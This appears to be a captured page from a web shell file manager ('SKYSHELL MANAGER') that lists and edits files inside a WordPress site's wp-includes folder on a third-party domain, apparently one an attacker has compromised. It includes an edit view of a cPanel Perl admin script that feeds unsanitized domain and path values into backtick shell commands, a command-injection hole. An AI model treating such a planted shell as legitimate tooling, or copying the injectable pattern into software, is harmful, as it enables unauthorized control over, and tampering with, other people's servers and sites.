📁
SKYSHELL MANAGER
PHP v8.2.31
Create
Create
Path:
root
/
home
/
thevaxnx
/
nativize.com
/
staging
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
wp-links-opml.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: HBLKCTL
#!/usr/local/cpanel/3rdparty/bin/perl package HostingCommon::HBLKCTL; use strict; use warnings; use parent 'Cpanel::AdminBin::Script::Call'; use Cpanel::FileUtils; use Cpanel::Mkdir; __PACKAGE__->run() if !caller; sub _actions { return qw( list block unblock ) } sub list { return `hablkctl -l` } sub block { my ( $self, $domain, $path ) = @_; if ($path) { $path = " -p $path"; } return `hablkctl -d $domain $path`; } sub unblock { my ( $self, $domain, $path ) = @_; if ($path) { $path = " -p $path"; } return `hablkctl -d $domain $path -r`; } 1;
Save